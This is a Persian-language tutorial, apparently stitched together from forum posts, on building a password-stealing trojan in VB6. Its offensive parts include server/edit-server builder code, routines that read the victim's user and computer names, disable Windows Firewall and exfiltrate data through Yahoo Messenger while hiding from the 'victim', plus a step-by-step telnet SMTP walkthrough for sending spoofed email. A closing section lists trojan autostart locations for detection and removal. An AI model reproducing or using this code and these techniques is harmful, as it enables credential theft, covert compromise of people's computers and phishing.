پسورد سندر نسبت به تروجان کد نویسی ساده تری داره و اصولا برای این نوشته میشه که یک سری پسورد های خاص رو برای نویسنده ش بفرسته ، مثلا پسورد مسنجرها یا چیزهایی از این قبیل. ولی بک تروجان علاوه براین کارها مهمترین چیزی رو که یک هکر می خواد رو براش میاره یعنی: دسترسی کامل به کامپیوتر قربانی . پس یه تروجان می تونه پسورد سندر و کیلاگر(کی لوگر!!) و خیلی چیزهای دیگه رو هم در خودش داشته باشه. من نمی تونم ادعا کنم که یک تروجان کامل نوشتم ولی پسورد سندری که من نوشتم نسبتا مناسب بود و کارش رو به خوبی انجام می داد( البته اگه ایرادتش رو نگم). پس باید بدونید که هدف من آشنا کردن شما با نحوه ی کد نویسی یک پسورد سندر در وی بی هست

ارتباط بین سرور و ادیت سرور:

خوب کسایی که نمی دونن بدونن که سرور همون فایلی هست که شما به کامپیوتر قربانی واردش می کنید و ادیت سرور تنظیمات این فایل رو انجام می ده. البته پی اس (از این به بعد به پسورد سندر می گم پی اس) هایی هم هستن که بدون ادیت سرور نوشت همی شن و اصولا در اختیار عموم قرار نمی گیرن (مثل کد PS1 در فولدر اصلی مقاله که کار یکی از پی اس نویسای معروف ایران هست و آموزشی هست) ولی خیلی ها دوست دارن پی اس با ادیت سرور بنویسین.

اصولا چند راه هست که این ارتباط رو برقرار کنید و نیازی به قرار دادن سورس سرور در ادیت سرور نیست. من یه راه رو معرفی می کنم که فهمش ساده تر هست و تو پی اس خودم ازش استفاده کردم. (اون راه های دیگه رو اگه دوست داشتید تو فولدر E/S Connection   بررسی کنید که سورس کامل Toxic-Ps ،  Toxic-Cv،  PSGهست .) برای این کار ما به یک Property Bag  نیاز داریم که اطلاعاتی که می خوایم تو سرور باشن رو توسط ادیت سرور خیلی راحت توش بذاریم. بعد هم سرور که اجرا شد اون اطلاعات رو می خونه و ازش استفاده می کنه! به همبن راحتی! (گفتن نه نوشتن) این اطلاعات میتونه هر چیزی باشه مثل آدرس ایمیلی که اطلاعات می خواهید به اونجا فرستاد هبشه و ازاین قبیل. خوب من این کدها رو پایین آوردم و می تونید بررسی کنید چجوری اطلاعات تو فایل سرور نوشته و توسط سرور خونده می شوند.

Edit Server:

On Local Error GoTo errTrap

    Dim BeginP As Long

    Dim Bag As New PropertyBag

    Dim Temp As Variant

    Dim mahmoud() As Byte

    Dim er As String

    With Bag

        .WriteProperty "id", id.Text

        .WriteProperty "force", force.Value

        .WriteProperty "dial", dial.Value

        .WriteProperty "user", user.Value

        .WriteProperty "com", com.Value

        .WriteProperty "fire", fire.Value

        .WriteProperty "IP", ip.Value

        .WriteProperty "image", preview.Image1.Picture

        .

        .

        .                                                                                                   

    End With

    Open App.Path + "\" + "serv.exe" For Binary As #2

    mahmoud = LoadResData(101, "CUSTOM")

    Put #2, , mahmoud()

    Close #2

     FileCopy App.Path & "\serv.exe", App.Path & "\" & SrvName.Text

    Open App.Path & "\" & SrvName.Text For Binary As #1

        BeginP = LOF(1)

        Temp = Bag.Contents

        Seek #1, LOF(1)

        Put #1, , Temp

        Put #1, , BeginP

    Close #1

  Kill App.Path + "\" + "serv.exe"

  Exit Sub

errTrap:

MsgBox Err.Description, vbCritical, "Error"

در اینجا تمام اطلاعات در یک Property Bag  نوشته می شود و بعد هم می ره داخل سرور!

فقط باید بدونید که من ابتدا ریسورس فایل سرور رو داخل ادیت سرور قرار دادم. برای این کارابتدا از قسمت Add-in Manager  ، VB6 Resource Editor رو فغال کنید .بعد رو    کلیک کنید . حالا Add Custom Resource  رو بزنید و فایل سرور رو انتخاب کنید.می تونید اسم این ریسورس رو هم عوض کنید البته من همون 101 رو به صورت پیشفرض انتخاب کردم.قسمتهایی هم که در کد بالا خط کشیدم مربوط به لود کردن همین ریسورس و تبدیل آن به فایل اجرایی است.

حالا کدهای مربوط به سرور و نحوه ی خوندن اطلاعات رو بررسی می کنیم.

Server:

On Local Error Resume Next

    Dim BeginP As Long

    Dim Temp As Variant

    Dim bArr() As Byte

    Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1

        Get #1, LOF(1) - 3, BeginP

        Seek #1, BeginP

        Get #1, , Temp

        Arr = Temp

        Bag.Contents = Arr

        Bag.WriteProperty "LOF", LOF(1)

        Bag.WriteProperty "BeginPos", BeginPos

   Close #1

    With Bag

    ID.Caption = .ReadProperty("id")

     FileNameInstall.Caption = .ReadProperty("filename")

     Username.Value = .ReadProperty("user")

      Computername.Value = .ReadProperty("com")

      Firewall.Value = .ReadProperty("fire")

      Rand.Enabled = .ReadProperty("rand")

                                                                                                                .

.                                                                                                                                  

    End With

ساده بود نه؟ این کارا رو شما هم می تونید انجام بدید. در اینجا اطلاعات از داخل فایل سرور خونده می شود و بر اساس اون مثلا یک تایمر خاص فعال می شود یا یه چیزی مثل این.

خب می ریم سراغ قسمت اصلی که می خواهیم با هم کدهای مخرب رو بنویسیم. این بستگی داره به مهارت برنامه نویسی  شما و استعداد شما در این زمینه.چون من هیچ وقت نمی تونم اون چیزی رو که دقیقا شما می خواهید بهتون بدم.پس اینجا با کدهای ساده به صورت دسته بندی شده می ریم جلو که خیلی هاشون تو اکثر پی اس ها استفاده  می شن. من اگر بخوام طرز کار همشون رو بهتون خیلی طولانی می شه.پس اینو به خودتون واگذار می کنم. اول تموم توابع API  لازم دارید رو به برنامه اضافه کنید تا مشکلی پیش نیاید.

(زیر اسم توابع API  خط کشیدم).

_______________________________________

Public Function SysDir() As String

  Dim SysPath As String

  SysPath = String(255, vbNullChar)

  GetSystemDirectory SysPath, 255

  SysDir = Left(SysPath, InStr(SysPath, vbNullChar) - 1)

End Function

برگشتی این تابع مسیری تو مایه های C:\WINDOWS\System32  هست!

_______________________________________

Public Property Get ReadKey(Value As String) As String

Dim B As Object

On Error Resume Next

Set B = CreateObject("wscript.shell")

r = B.RegRead(Value)

ReadKey = r

End Property

با این کد می تونید کلید های درون رجیستری رو بخونید که تو دو تابع بعدی ازشون استفاده کردم.

 _______________________________________

Public Sub getuser()

Dim UserString As String

UserString = ReadKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName")

User.Text = Username

End Sub

با این روال می تونید یوزر نیم کاربری که به ویندوز لاگین کرده رو بدست بیارید .

_______________________________________

Public Sub getCom()

Dim CompName As String

CompName = ReadKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AltDefaultDomainName")

com.Text = CompName

End Sub

با این روال می تونید کامپیوتر نیم قربانی رو بدست بیارید.

_______________________________________

Public Sub fire()

Dim objFireWall As Object

 Set objFireWall = CreateObject("HNetCfg.FwMgr")

 Set objpolicy = objFireWall.localpolicy.currentprofile

 objpolicy.firewallenabled = False

End Sub

این روال تو اکثر پی اس ها استفاده شده ست و می تونه فایروال ویندوز رو غیر فعال کنه!

_______________________________________

Private Sub CheckW()

Dim hwnd As Long

Dim wn As String

wn = Space(255)

hwnd = GetForegroundWindow

Handle.Text = Str(hwnd)

whandle.text= hwnd

GetWindowText hwnd, wn, GetWindowTextLength(hwnd) + 1

title.Text = wn

End Sub

Private sub close()

Dim I as integer

For i=0 to closelist.listCount-1

If closelist.list (i)=title.text then PostMessage whandle, WM_CLOSE, 0&, 0&

Next i

End sub

این دو تا کد با هم کار می کنن.یعنی روال اولی که باید درون یک تایمر باشه، پنجره ی فعال رو تشخیص میده و هندل و عنوان اون رو تو دو تا تکست باکس می ذاره و کد دوم هم هروقت پنجره ی مخصوصی که شما اسمش رو تو Closelist  گذاشتید باز بشه، اون پنجره رو می بنده(این بستگی به شما داره که چجوری بخواهید اسامی پنجره ها رو وارد اون لیست باکس کنید.منظورم بر می گرده به قسمت چگونگی طراحی ادیت سرور).

_______________________________________

ShellExecute Me.hwnd, "open", "ymsgr:sendIM?" + ID + "&m=" + mess, 0&, App.Path, 0&

این همون کدی هست که باهاش می تونید توسط یاهو مسنجر مسیج برای یک آیدی خاص بفرستید (البته خیلی ابتداییه) .خب بازم این هنر شمایه که چجوری این پیام رو بفرستید که قربانی متوجه نشه. ضمنا بگم در صورتی این کد کارمی کنه که طرف با یاهو لاگین کرده باشه. وگرنه فقط یاهو باز می شه و طرف شک می کنه. همچنین باید بتونید این صفحه رو از دید قربانی مخفی نگه دارید چون همه چی واضح دیده می شه. ببینم چه میکنین!!

××××××××××××××××××××××××××××××××××

 یک کد برای ارسال pm به یاهو 8:

کد:
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Sub Command1_Click()
ShellExecute Me.hwnd, "open", "ymsgr:sendIM?" + Text1.Text + "&m=" + Text2.Text, 0&, App.Path, 0&
SendKeys "{enter}"
End Sub

 ***********************************

حالت کلی فرستادن pm به یا هو را من با این modul بهتون نشون می دم
دیگه خودتون یکم دستکاریش کنین و تغییرش بدین:

حالت کلی فرستادن pm به یا هو را من با این modul بهتون نشون می دم
دیگه خودتون یکم دستکاریش کنین و تغییرش بدین

Public Declare Function SetForegroundWindow Lib "User32" (ByVal hwnd As Long) As Long
Public Declare Function sndPlaySound Lib "winmm.dll" Alias "sndPlaySoundA" (ByVal lpszSoundName As String, ByVal uFlags As Long) As Long
Public Const SND_ASYNC = &H1
Public Declare Function EnableWindow Lib "User32" (ByVal hwnd As Long, ByVal fEnable As Long) As Long
Public Declare Function FindWindow Lib "User32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "User32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function GetMenuItemCount Lib "User32" (ByVal hMenu As Long) As Long
Public Declare Function GetMenu Lib "User32" (ByVal hwnd As Long) As Long
Declare Function GetCursorPos Lib "User32" (lpPoint As POINTAPI) As Long
Public Declare Function GetMenuItemID Lib "User32" (ByVal hMenu As Long, ByVal nPos As Long) As Long
Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Public Declare Function GetMenuString Lib "User32" Alias "GetMenuStringA" (ByVal hMenu As Long, ByVal wIDItem As Long, ByVal lpString As String, ByVal nMaxCount As Long, ByVal wFlag As Long) As Long
Public Declare Function GetSubMenu Lib "User32" (ByVal hMenu As Long, ByVal nPos As Long) As Long
Public Declare Function GetWindow Lib "User32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Public Declare Function PostMessage Lib "User32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Declare Function SendMessage Lib "User32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Declare Function SendMessageLong& Lib "User32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long)
Public Declare Function SendMessageByString Lib "User32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As String) As Long
Public Declare Function SetWindowPos Lib "User32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Public Declare Function ShowWindow Lib "User32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Public Const BM_SETCHECK = &HF1
Public Const BM_GETCHECK = &HF0
Const HWND_TOPMOST = -1
Const HWND_NOTOPMOST = -2
Const SWP_NOSIZE = &H1
Const SWP_NOMOVE = &H2
Const SWP_NOACTIVATE = &H10
Const SWP_SHOWWINDOW = &H40
Private Declare Function Escape Lib "gdi32" (ByVal hdc As Long, _
     ByVal nEscape As Long, ByVal nCount As Long, lpInData As Any, _
     lpOutData As Any) As Long
Private Declare Function DeleteDC Lib "gdi32" (ByVal hdc As Long) As Long
Private Declare Function StretchBlt Lib "gdi32" (ByVal hdc As Long, _
     ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, _
     ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, _
     ByVal ySrc As Long, ByVal nSrcWidth As Long, _
     ByVal nSrcHeight As Long, ByVal dwRop As Long) As Long
Private Declare Function SelectObject Lib "gdi32" (ByVal hdc As Long, _
     ByVal hObject As Long) As Long
Private Declare Function CreateCompatibleDC Lib "gdi32" _
     (ByVal hdc As Long) As Long
    Private Declare Function SwapMouseButton& Lib "User32" _
(ByVal bSwap As Long)
Private Declare Function ShowCursor& Lib "User32" _
(ByVal bShow As Long)
    Private Const WM_SYSCOMMAND = &H112&
    Private Const SC_MONITORPOWER = &HF170&
    Dim mousehide As Boolean
    Dim fliphorizontal As Boolean, flipvertical As Boolean, thechange  'declare the variables
    Dim hIn As Integer
    Dim Sending As Boolean, Sending2 As Boolean, stopit As Boolean
Public Const EWX_FORCE = 4
Public Const EWX_LOGOFF = 0
Public Const EWX_REBOOT = 2
Public Const EWX_SHUTDOWN = 1

Public Const CB_GETCOUNT = &H146
Public Const CB_GETLBTEXT = &H148
Public Const CB_SETCURSEL = &H14E

Public Const GW_HWNDFIRST = 0
Public Const GW_HWNDNEXT = 2
Public Const GW_CHILD = 5

Public Const LB_GETCOUNT = &H18B
Public Const LB_GETTEXT = &H189
Public Const LB_SETCURSEL = &H186

Public Const SW_HIDE = 0
Public Const SW_MAXIMIZE = 3
Public Const SW_MINIMIZE = 6
Public Const SW_NORMAL = 1
Public Const SW_SHOW = 5

Public Const VK_SPACE = &H20

Public Const WM_CHAR = &H102
Public Const WM_CLOSE = &H10
Public Const WM_COMMAND = &H111
Public Const WM_GETTEXT = &HD
Public Const WM_GETTEXTLENGTH = &HE
Public Const WM_KEYDOWN = &H100
Public Const WM_KEYUP = &H101
Public Const WM_LBUTTONDBLCLK = &H203
Public Const WM_LBUTTONDOWN = &H201
Public Const WM_LBUTTONUP = &H202
Public Const WM_MOVE = &HF012
Public Const WM_RBUTTONDOWN = &H204
Public Const WM_RBUTTONUP = &H205
Public Const WM_SETTEXT = &HC
Public LastPoint As POINTAPI

Public lngTPPY As Long
Public lngTPPX As Long

Type POINTAPI
        X As Long
        Y As Long
End Type

Sub SendPM(Who As String, Text As String)
'oz RoOzY
'Ex. : call SendPM("ngsp_public_msg","salam")

Dim imclass As Long, editx As Long
imclass = FindWindow("imclass", vbNullString)
editx = FindWindowEx(imclass, 0&, "edit", vbNullString)
Call SendMessageByString(editx, WM_SETTEXT, 0&, Who)
ChatSend (Text)
End Sub
Sub ChatSend(TheText)
Dim imclass As Long
Dim richedit As Long
Dim Button As Long
imclass& = FindWindow("IMClass", vbNullString)
richedit& = FindWindowEx(imclass&, 0&, "RICHEDIT", vbNullString)
Call SendMessageByString(richedit&, WM_SETTEXT, 0&, TheText)
Button& = FindWindowEx(imclass&, 0&, "Button", vbNullString)
Button& = FindWindowEx(imclass&, Button&, "Button", vbNullString)
Button& = FindWindowEx(imclass&, Button&, "Button", vbNullString)
Button& = FindWindowEx(imclass&, Button&, "Button", vbNullString)
Call SendMessageLong(Button&, WM_KEYDOWN, VK_SPACE, 0&)
Call SendMessageLong(Button&, WM_KEYUP, VK_SPACE, 0&)
End Sub
موفق باشی

smpt جدید هات میل:mx01.hotmail.com

SMTP های جدید یاهو به قرار زیر است:

e.mx.mail.yahoo.com
f.mx.mail.yahoo.com
g.mx.mail.yahoo.com
a.mx.mail.yahoo.com
b.mx.mail.yahoo.com
c.mx.mail.yahoo.com
d.mx.mail.yahoo.com

mta125.mail.re4.yahoo.com

mta119.mail.re1.yahoo.com 

 mta144.mail.re1.yahoo.com

 mta249.mail.mud.yahoo.com

1- یکی از ساده ترین راهها استفاده از سایتهایی مثل google است که با جستجوی عبارت SMTP Server، هزاران سرور پیدا کنیم.
2- استفاده از SMTP Server سایت دانشگاهها. تجربه برایم ثابت کرده که این روش یکی از بهترینهاست.
3- استفاده از یکسری SMTP Server های مشهور. این روش هم بد نیست.

حالا روش را عملاً نشانتان میدهم:
اول باید یک سرور را مشخص کنید که از طریق آن می خواهید Fake Mail را بفرستید. همانطور که قبلاً گفتم، اگر مثلاً می خواهید برای یک نفر که Mail Box او در یاهو است، Fake Mail بزنید، سرور را همان سرور در نظر بگیرید یعنی از خود yahoo.com برای ارسال استفاده کنید. بعد باید ببینید که در این سرور کدام subdomain باید استفاده کنید (یعنی اینکه SMTP Server سرور آدرسش، mail.yahoo.com است یا mx.yahoo.com است یا چیز دیگر). برای این کار دو روش را میگوم:

1- از nslookup استفاده کنیم:
اول باید با whois یک Name Server پیدا کنیم و بعد از طریق آن، سایت را nslookup کنیم. مثلاً میخواهم SMTP Server مربوط به KsN.com را پیدا کنم. اول یک whois میکنم و می بینم که Name Server سایت، s1.sazin.com و s2.sazin.com است. حالا nslookup میکنم و آن سطرهایی را می خوانم که با نام MX مشخص شده است و دو تا آدرس می بینم که عبارتند از: KsN.com و mail.KsN.com پس SMTP Server های سایت KsN.com همین دو آدرس است. در نتیجه اگر بخواهم از سایت KsN.com برای ارسال Fake Mail استفاده کنم، از این آدرسها باید بهره گیرم.

2- استفاده از بعضی سایتهای خاص:
یکی از این سایتها، http://www.mob.net/~ted/tools/mx.php3 است. در این سایت، نام سایت را می نویسید و دکمه lookup را کلیک میکنید. مثلاً من نوشتم yahoo.com و به نتایج زیر رسیدم:

Domain Server: ns.mob.net
yahoo.com mail is handled by 5 mx4.mail.yahoo.com.
yahoo.com mail is handled by 1 mx1.mail.yahoo.com.
yahoo.com mail is handled by 1 mx2.mail.yahoo.com.

Domain Server: ns.cw.net
yahoo.com mail is handled by 5 mx4.mail.yahoo.com.
yahoo.com mail is handled by 1 mx1.mail.yahoo.com.
yahoo.com mail is handled by 1 mx2.mail.yahoo.com.

مشخص است که SMTP Server های سایت yahoo.com عبارتند از:
mx1.mail.yahoo.com, mx2.mail.yahoo.com, mx4.mail.yahoo.com

هر سرور برای ارسال ایمیل از پروتکل SMTP استفاده میکنه. این پروتکل توانایی خواندن E-mail را نداره و فقط می‌تونه E-mail بفرسته.پورت ۲۵ : این پورت ۲۵ برای ارسال E-mail به‌کار می‌ره و این پورت از برنامه های SMTP Server برای ارسال استفاده می کنه. برای صحبت کردن با پورت ۲۵ اول باید یک Server پیدا کنیم که پورت ۲۵ در آن باز باشه و بعد باید طبق معمول از telnet برای ارتباط استفاده کنیم.
SMTP Server ها اهمیتی نمی‌دهند که شما کی هستید و به کی می‌خواهید میل بزنید، بلکه فقط کار خود را می‌کنند. پس به هر آدرس توجه کامل نکنین، شاید جعلی باشه   چگونه یک SMTP سرور پیدا کنیم :
کار سختی نیست. ولی ما توصیه می‌کنم از سروری کمک بگیرین که مربوط به Mail Box قربانی است. SMTP Server در نهایت روی یک سرور قرار دارد پس در حتما آدرس آن چیزی مثل smtp.noavar.com، mx01.hotmail.com و ... هست.
سایت‌ google رو باز کنید و عبارت SMTP Server را سرچ کنین. هزاران سرور پیدا می کنین.زود برین به آدرس http://www.mob.net/~ted/tools/mx.php3 بعد نام سایت را می‌نویسین و دکمه lookup را کلیک می‌کنین.(مثلا yahoo.com ) و می بینین:
Domain Server: ns.cw.net
yahoo.com mail is handled by 5 mx4.mail.yahoo.com.
yahoo.com mail is handled by 1 mx1.mail.yahoo.com.
yahoo.com mail is handled by 1 mx2.mail.yahoo.com.
مشخصه که SMTP Server های سایت yahoo.com عبارتند از: mx1.mail.yahoo.com , mx2.mail.yahoo.com , mx4.mail.yahoo.com
 خوب حالا میخوایم به یه نفر (مثلا ای میل بزنیم و میخوایم که طرف خیال کنه که از طرف test_zabet@yahoo.com است. (هر دو در سایت یاهو)  برای این کاراز telnet برای برقراری ارتباط استفاده می کنم. دستور زیر را در اعلان داس تایپ کنین.
telnet mx1.mail.yahoo.com 25
۲۵ همون شماره پورت ای میل هست و از سرور اصلی یاهو هم استفاده کردیم.خوب حالا شما باید این رو بینین:
220 YSmtp mta499.mail.yahoo.com ESMTP service ready
دقت کنید که چون از telnet استفاده می‌کنین، چیزهایی را که تایپ می‌کنین، نمی‌بینین و نمی‌تونید از دکمه BackSpace استفاده کنین.تایپ کنین HELO yahoo.com و جواب می‌شنویم: 250 mta499.mail.yahoo.com
حالا باید مشخص کنم که E-mail فرستنده چیه. پس می‌نویسم: MAIL FROM:test_zabet@yahoo.com
حالا باید بگم که این E-mail به چه آدرس ارسال بشه مثلآ RCPT TO: yaftz@yahoo.com
 وDATAحالا باید بنویسم  Enter بزنم و جواب می‌شنوم:354 go ahead
 اینجا وقت تایپ کردن یک سری چیز‌های اساسی است. اول می‌نویسم
From: R D test_zabet@yahoo.com این همان اسمی است که به عنوان Sender یا همان From دیده میشه. حالا می‌نویسم:salam و بعد Subject این هم در آن E-mail به عنوان subject دیده میشه.
MIME-Version: 1.0
Content-Type: text/plain;
خوب دوبار Enter زده و متن نامه را می‌نویسم:
دقت کنید که یک . (نقطه) در سطر آخر بنویسید و بعد Enter بزنید. با این روش به پورت ۲۵ میگیدکه متن نامه تمام شده.
می‌نویسم QUIT تا ارتباط قطع و از telnet خارج بشیم

این فایل ها در حقیقت فایل های متنی (TXT) ساده هستند، که بوسیله برنامه Notepad می توان یک فایل (TXT) را به سادگی ایجاد کرد.  این فایل ها بوسیله ویندوز و برنامه های تحت ویندوز مورد استفاده قرار می گیرند تا اطلاعاتی در مورد خواسته های شما و محیط عملکرد خود ذخیره کنند. INI. مخفف initialization است.

ساختار فایل INI.:

فایل INI. شامل یک یا چند بخش است هر بخش با یک نام بخش (section name) آغاز می شود که ممکن است، هیچ یا چندین ورودی وجود داشته باشد. که بعد از آن قرار می گیرد.

[بخش]

ارزش=نام کلید

اگر توضیحی وجود داشته باشد بعد از «سمی کالن» (;) قرار می گیرد.

ویندوز از چندین استاندارد برای فایل های INI. استفاده می کند تا اطلاعات پیکر بندی کامپیوتر را ذخیره کند. فایل هایی که این اطلاعات را نگهداری می کنند عبارتند از :

WIN.INI, SYSTEM.INI, PROGMAN.INI, PROTOCOL.INI, SHARED.INI, WINFILE.INI, CONTROL.INI, SCHDPLUS.INI

نرم افزارهای تحت ویندوز هم بعد از نصب شدن ممکن است قسمتهایی به WIN.INI اضافه کنند و همچنین خود فایل های INI. به دایرکتوری ویندوز اضافه کنند.

ایجاد تغییرات در فایل های INI.

چون فایل های INI. از یک متن ساده استفاده می کنند. بوسیله یک برنامه متنی ساده مانند Notepad می توانند ویرایش شوند.

همانطور که در شماره قبل وعده داده بودیم، در این شماره به بررسی روشهای مختلف به کار گرفته شده توسط ترواها برای اجرا شدن با هر بار اجرای ویندوز می پردازیم تا بتوانیم از این طریق آنها را شناسایی و حذف کنیم. اگرچه به روشهای قدیمی هم اشاره مختصری خواهیم کرد، فقط به بررسی روشهای امروزی می پردازیم. با اینکه در مورد حذف ترواها بعداً بیشتر خواهیم نوشت، پس از مطالعه این مقاله شما باید بتوانید نه تنها ترواها، بلکه سایر برنامه های احتمالاً مزاحمی را که با هر بار اجرای ویندوز شما خود را اجرا می کنند بیابید. اگرچه این متن کمی تخصصی به نظر می رسد، اصلاً وحشت نکنید، یکبار آن را با حوصله بخوانید و سپس بار دوم ضمن خواندن متن، کارهای نوشته شده در آن را انجام دهید.

 روشهای مختلفی که یک برنامه می تواند از طریق آنها خود را با هر بار اجرای ویندوز اجرا کند عبارتند از:

 1- استفاده از winstart.bat: در این روش که مناسب ویندوزهای قدیمی است، فایلی به نام winstart.bat در شاحه ویندوز ساخته می شود و برنامه از این فایل فراخوانی می شود؛ به این صورت که اگر این فایل موجود نباشد ساخته می شود و در غیر این صورت فقط نام برنامه به آن اضافه می شود.

2- استفاده از win.ini: در این روش که امروزه زیاد مورد استفاده قرار نمی گیرد، با نوشتن عبارت load=filename.exe (که به جای filename.exe نام برنامه قرار می گیرد) یا Run=filename.exe در قسمت [windows]، برنامه مورد نظر با هر بار اجرای ویندوز اجرا خواهد شد. برای باز کردن فایل Win.ini و مشاهده محتویات آن، بهترین روش استفاده از برنامه System configuration editor ویندوز است. برای اجرای این برنامه از منوی Start، Run را انتخاب کنید (یا کلید ویندوز کیبورد خود را بگیرید و سپس کلید R را فشار دهید)، تایپ کنید SysEdit و OK را فشار دهید. از بین فایلهای باز شده فایل مورد نظر را پیدا کنید. اگر دقیقاً با این فایلها آشنایی ندارید، مواظب باشید که تغییری در این فایلها ندهید و اگر دادید، تغییرات خود را ضبط نکنید.

 3- استفاده از System.ini: این روش بسیار مشابه روش بالاست. و مانند بالا این فایل هم درون System configuration editor قابل مشاهده است. اگر در این فایل به عبارتی مشابه shell=Explorer.exe trojan.exe برخورد کردید، سیستم شما بلافاصله پس از اجرای explorer.exe، trojan.exe را اجرا خواهد کرد.

 4- استفاده از Start up: هر برنامه ای که در منوی Start داخل قسمت Startup قرار بگیرد، با هر بار اجرای ویندوز خود به خود اجرا خواهد شد. Startup در ویندوزهای جدیدتر در قسمت All programs منوی Start قرار دارد.

 5- استفاده از رجیستری: این روش که در حال حاضر متداولترین روش مورد استفاد ترواها و کرمها می باشد به این صورت است که نام فایل اجرایی به قسمت Run در رجیستری اضافه می گردد. رجیستری ویندوز حاوی اطلاعات مختلفی از سخت افزارها و نرم افزارهای گوناگون نصب شده روی سیستم شماست. برای مشاهده رجیستری، از منوی Start، Run را انتخاب کنید (یا کلید ویندوز کیبورد خود را بگیرید و سپس کلید R را فشار دهید) و در داخل جعبه متن آن تایپ کنید: RegEdit و OK را فشار دهید. اگر دقیقاً با رجیستری آشنایی ندارید، مواظب باشید که تغییری در آن ندهید. از میان قسمتهای مختلف رجیستری در اینجا ما با HKEY_CURRENT_USER و HKEY_LOCAL_MACHINE سروکار داریم. یکی از ایندو را انتخاب کنید و روی آن Double Click کنید (یا روی علامت + کنار آن کلیک کنید) حال به ترتیب گزینه های زیر را انتخاب کنید تا به Run برسید:

Software -> Microsoft -> Windows -> Current Version -> Run

      در شرایطی که بیش از یک نفر از یک رایانه استفاده می کنند و روی آن کاربران مختلف تعریف کرده اند، معمولاً برنامه هایی که در قسمت Run موجود در HKEY_LOCAL_MACHINE نامشان نوشته شده باشد با هر بار اجرای ویندوز برای تمام کاربران آن اجرا می شوند اما برنامه هایی که نام آنها در HKEY_CURRENT_USER آمده باشد فقط برای کاربری که در حال حاضر از سیستم استفاده می کند اجرا خواهند شد.

       ممکن است علاوه بر Run، گزینه هایی به نامهای RunOnce، RunServices یا RunServicesOnce را هم دیده باشید که آنها هم همین اثر را دارند با این تفاوت که اگر نام برنامه ای در RunOnce یا RunServicesOnce قرار بگیرد فقط یکبار یعنی فقط دفعه بعدی که ویندوز اجرا می شود به همراه ویندوز اجرا خواهد شد.

       6- روش ShellOpen رجیستری: در رجیستری و در زیر کلیدهای زیر باید همیشه عبارت "%1" %* نوشته شده باشد اما اگر به عبارتی مانند trojan.exe "%1" %*  برخورد کردید، بدانید که فایل Trojan.exe سعی دارد کاری کند با هر بار اجرای هر فایل اجرایی روی رایانه شما، او هم اجرا شود:

  [HKEY_CLASSES_ROOT\exefile\shell\open\command]

  [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command]

       7- استفاده از روشهایی مانند  Binding و جایگزینی: اگرچه روشهایی که در بالا نوشته شد حاوی تمامی روشهایی است که امروزه مورد استفاده قرار می گیرند، روشهای اجرا هرگز به موارد فوق ختم نمی شوند و همیشه جای ابتکار یا استفاده از روشهایی که فقط روی سیستمها یا در شرایط خاصی عمل کنند باز است بنابراین به صرف اینکه مطمئن شوید از طریق روشهای بالا سیستم شما آلوده نشده است کفایت نمی کند. به عنوان نمونه در روشهایی مانند  Binding و جایگزینی که هنوز چندان مورد استفاده قرار نگرفته و پیش بینی می شود در آینده نزدیک بیشتر مورد استفاده قرار بگیرند، فایلی که قرار است با هر بار اجرای ویندوز خود را اجرا کند، فایل دیگری را پیدا می کند که این کار را انجام دهد و سپس خود را به آن می چسباند. به عنوان نمونه با تشخیص اینکه روی سیستم، فایل مربوط به ویندوز مسنجر با هر بار اجرای ویندوز اجرا می شود، کاری می کند که در هنگام اجرای ویندوز مسنجر، آن برنامه هم اجرا شود. اگر برنامه برای این کار خود را به فایل اجرایی مسنجر ویندوز بچسباند، می گویند از Binding استفاده کرده است اما اگر خود را جایگزین آن کند، می گویند از روش جایگزینی استفاده کرده است. اگرچه این روشها از قدیم توسط ویروسهای مختلف برای آلوده کردن فایلهای اجرایی به کار گرفته می شدند اما استفاده از این روش برای اجرای همزمان با ویندوز احتمالاً به زودی بیشتر مورد استفاده قرار خواهد گرفت.

